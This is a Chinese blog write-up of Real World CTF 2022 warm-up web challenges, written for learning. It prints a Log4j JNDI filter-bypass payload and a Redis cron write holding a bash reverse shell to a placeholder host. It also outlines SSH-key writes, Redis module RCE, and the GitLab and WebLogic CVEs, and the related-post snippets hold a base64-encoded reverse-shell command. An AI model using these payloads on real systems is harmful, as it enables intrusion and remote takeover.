Real World CTF 2022(体验赛)部分WP

已于 2022-03-31 15:37:05 修改
阅读量5.1k 收藏 3
点赞数 3
文章标签: 安全 web安全 网络安全
于 2022-01-24 14:53:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sorryagain/article/details/122664130
版权

文章目录

Real World CTF 2022(体验赛)

周末打了一下Real World CTF体验赛,据说难度比正赛降简单很多,比赛时间连续24小时,赛题类型涵盖Web/Pwn/Crypto/Reverse/Blockchain/Virtual Machine/Browser/IoT/Kernel 等等。
但是本次比赛解题方式和一般CTF不太一样,基本上都是通过CVE漏洞GETshell,与实战更为贴近。
本次比赛做的题都是Web题,简单记录一下,加深学习。如有问题请各位大佬指教。
本次比赛环境需要先访问指定端口,进行PoW(工作量证明),服务端给出Hash值前几位,需要在一定时间内提交满足条件的明文。比赛方给了参考的PoW脚本,参数跟上指定端口跑一下就行,成功之后会给你一个新的端口,访问这个端口即可进入比赛题目。注意的是每次生成心得环境存活时间600s,经常做着做着环境就挂了。。。重新跑一下就可以了。

Digital Souvenir

签到题,「解出赛题的战队」和「直播间参与互动的观众」,可以领取Real World CTF赛事定制的数字纪念品,去数字纪念品相关介绍页面,找到flag提交即可。
在这里插入图片描述

log4flag

看到题目名称就猜想到应该是log4j的RCE漏洞,打开题目是一个登录框:
在这里插入图片描述

试着构造一下exp:
${jndi:ldap://xx.xx.xx.xx:xx/}
发现返回参数错误,以admin/admin登录,返回登录失败,猜想可能过滤了关键字符,经过多次尝试发现过滤的是jndildap关键字。
或者下载题目附件,通过反编译查看代码,也可得知过滤器的过滤逻辑:
在这里插入图片描述
那么就需要进行过滤规则的绕过,采用lower case即可绕过:
${${lower:j}ndi:${lower:l}dap://xx.xx.xx.xx/}
vps起ldap和http服务:
在这里插入图片描述
即可拿到flag:
在这里插入图片描述

Be-a-Database-Hacker

这道题查看dockerfile文件,可以得知以下几点:

  1. 本题环境是一个redis服务,且版本号位4.0.14
  2. flag文件存放在/tmp/flag.txt
  3. redis服务是以redis用户启动的,即非root用户
FROM redis:4.0.14
COPY flag.txt /tmp/flag.txt
RUN chown redis:redis /tmp/flag.txt

通过redis-client可以直接成功连接,存在redis的未授权访问,但没有其他可用的信息。
redis的未授权访问漏洞,常见利用方式有以下几种,这里总结一下:

1. 写计划任务

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/xx.xx.xx.xx/xxxx 0>&1\n\n"
config set dir "/var/spool/cron"
config set dbfilename root
save

但是更改本地存放目录dir时失败,因为redis服务是以非root用户启动的,权限不够。
2. 写ssh公钥

config set dir /root/.ssh
config set dbfilename authorized_keys

同样更改本地存放目录失败,权限不够。
在这里插入图片描述

3. 写webshell
就没有web服务,上哪写webshell😂。
4. 主从复制
最后考虑主从复制,基于Redis主从复制的机制,可以通过FULLRESYNC将任意文件同步到从节点。
查了一下资料,在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的。
成功getshell。
在这里插入图片描述

the Secrets of Memory

查看配置文件,得知mysql账户的密码就是flag:

spring.datasource.url=jdbc:mysql://127.0.0.1:3306/flag?useUnicode=true&characterEncoding=utf-8
spring.datasource.username=the_datasource_password_is_flag
spring.datasource.password=this_is_flag

通过页面判断是Spring Boot应用,尝试actuator配置不当的漏洞,可以成功访问/actuator页面,这道以及后面的题都忘了截图了,没图🤦‍。
然后接着找到/actuator/heapdump路径,得到 GZip 压缩 hprof 堆转储文件。
用内存分析工具打开分析,找到flag:
在这里插入图片描述

baby flaglab

访问网站,是一个Gitlab网站,查看配置文件,得知服务版本。

FROM gitlab/gitlab-ce:13.10.1-ce.0

因为配置文件里给了flag的位置,开始以为是任意文件读取漏洞(CVE-2020-10977),所以尝试注册账号,但需要管理员审批。
管理员账号不可爆破,也不是默认口令。所以后面改变思路,寻找不需要登录用户的RCE漏洞,根据题目提示没有对图像上传进行严格校验(开始被误导,还以为是文件上传漏洞),定位到GitLab 远程命令执行漏洞(CVE-2021-22205)。
该漏洞是由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令。
没图🤦‍。

Flag Console

通过页面判断是Weblogic应用,访问发现存在后台控制管理端,爆破弱口令失败,猜想是通过某个CVE打,结合题目名称Console寻找合适的漏洞。
最终定位到CVE-2020-14882这个洞打,CVE-2020-14882 是一个 Console 的未授权访问,而 CVE-2020-14882 是在利用未授权访问的前提下,在 Console 进行代码执行,于是远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic Server Console 执行任意代码。

Ghost Shiro

以上题目做完基本上一天了,后来就没看了。。第二天早上起来简单看了一下这道题,但是时间不够了,大概看了一下配置文件可以读到shiro的key,然后通过shiro反序列化漏洞RCE,我的思路是这样,但是时间到了没来及试。

2ha0yuk7on.
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PwnHub2022冬季-部分真题
12-20
PwnHub2022冬季-部分真题
2022 RealWorld CTF体验Writeup
末初的CSDN博客
01-23 1988
文章目录Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote Debugger Digital Souvenir rwctf{RealWorldIsAwesome} log4flag 有一些正则过滤 网上bypass方法很多,随便找一个就行 ${${::-j}ndi:${lower:rmi}://vw3nw
深入解析RealWorldCTF 2024体验PWN方向题目
合天网安学院
02-21 917
本报告旨在对RealWorldCTF 2024体验中的Pwn方向题目——“Be-an-HTPPd-Hacker”进行深入解析和讲解。该题目涉及一个十一年前的项目,其基于C语言实现了HTTP协议。我们将通过对该协议进行栈溢出攻击,探索真实世界中的攻击手法,并从中学习更多有用的攻击技巧,以提升我们的安全水平。
Bibilibili 1024程序员节 CTF 启蒙
青冬的博客
10-24 3322
其中,username+password就是简单String标识,nonce是一个类似于安全性的严格模式,这个值越小,越容易算出对应的答案。正常跑这个js肯定是跑不出来的,所以我们可以改造一下,然后放到node.js中运行,顺便把i++换成i-- 会更快。在答题部分安全后,就可以开始对应的夺旗,然后就可以写篇文章水一水,不包含答案,仅仅是部分思路。然后post 提交到 /crack1/login就行。哔哩哔哩 (゜-゜)つロ 干杯~-bilibili。
麦克米伦
热门推荐
征心的博客
10-03 1万+
单词 a abandon abbreviation ability able abnormal aboard abolish abortion about above abroad absence absent absolute absolutely absorb abstract absurd abuse academic academy accelerate accelerator accen...
牛津3000词汇表(The Oxford 3000™)
Josh_Gao
04-12 4212
The Oxford 3000 is the list of the 3000 most important words to learn in English, from A1 to B2 level.
2022 Real World CTF 体验 writeup
b1ackc4t的博客
01-23 1716
log4flag 最近风靡全球的log4j2漏洞,加了一个正则过滤 用log4j自带的语法便轻松绕过,然后常规jndi注入攻击,需要一台在公网的vps 在自己vps上使用工具搭建ldap服务 https://github.com/welk1n/JNDI-Injection-Exploit java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54LzE
2022RWCTF体验webwp
qq_48511129的博客
01-24 1371
1.Digital Souvenir 兑换码 RealworldIsAwesome 2.log4flag 参考 https://le1a.gitee.io/posts/3e4e56bc/ 启动jndi服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuNDYuOTQvMTIzNDUgMD4mMQ==}|{base64,-d}|{bash,-
RealWorldCTF渗透第二期 (官方的wp梳理)
weixin_45908624的博客
03-13 634
RealWorldCTF渗透第二期官方wp梳理
2023第五届 Real World CTF 体验 Writeup(web
一只爱吃橙子的羊
01-12 2329
2023第五届 Real World CTF 体验 Writeup(web
RealWorldCTF2023体验 部分WEB
weixin_43610673的博客
01-09 601
基本考察今年的真实漏洞
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
对于一些CTF写的wp.zip
09-30
项目源码
2022工业互联网大-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
CTF真题-Dest0g3CTF2022招新
06-01
CTF真题-Dest0g3CTF2022招新,来自BUUCTF
人工智能安全与光明时代
qq18218628646的博客
04-19 789
模式许可和监督可能会适得其反,因为以不可持续的方式集中权力
黑龙江—等保测评三级安全设计思路
2403_84237550的博客
04-19 908
本方案在对信息系统可能面临的安全威胁进行分析的基础上,结合安全域的划分,从物理层、网络层、系统层、应用层、数据层和管理层几个安全层面进行了整体的安全设计,在整体保障框架的指导下,综合多种有效的安全防护措施,进行多层和多重防御,实现纵深防御。3、体现了分域防护的思想。不同的安全等级要求具有不同的基本安全保护能力,实现基本安全保护能力将通过选用合适的安全措施或安全控制来保证,可以使用的安全措施或安全控制表现为安全基本要求,依据实现方式的不同,信息系统等级保护的安全基本要求分为技术要求和管理要求两大类。
安全开发实战(4)--whois与子域名爆破
weixin_72543266的博客
04-18 836
安全开发实战(4)--whois与子域名爆破 Whois 查询是一种用于获取有关互联网域名注册信息的公共查询服务。当注册一个域名时,必须提供一些个人或组织信息,例如姓名、电子邮件地址、联系电话等。这些信息通常是公开的,可以通过 Whois 查询来获取。在渗透测试中,Whois 查询可以我们收集目标组织的关键信息。组织联系信息:包括名称、地址、电话号码和电子邮件地址。这些信息可以用于建立联系、进行社会工程攻击或者其他类型的攻击。域名到期日期:了解域名何时到期可以帮助我们预测目标可能面临的安全风险。
网络通信安全
最新发布
m0_68637281的博客
04-24 223
TCP/IP体系结构、以太网、Internet地址、端口TCP/IP协议简介如下:(from文心一言)TCP/IP(Transmission Control Protocol/Internet Protocol,传输控制协议/网际协议)是一个由FTP、SMTP、TCP、UDP、IP等协议构成的协议簇,它能够在多个不同网络间实现信息传输。TCP/IP协议并不仅仅指的是TCP和IP两个协议,而是由多个协议共同组成的一个协议簇。其中,TCP协议和IP协议因其最具代表性,所以整个协议簇被称为TCP/IP协议。
ctfhub 全部WP
09-22
引用:MIME((Multipurpose Internet Mail ...由于ctfhub是一个综合性的CTF平台,涵盖了大量的题目和解题思路,每个题目的WP都有着不同的内容和解法。如果您对特定的题目或解题方法感兴趣,我可以为您提供更多信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值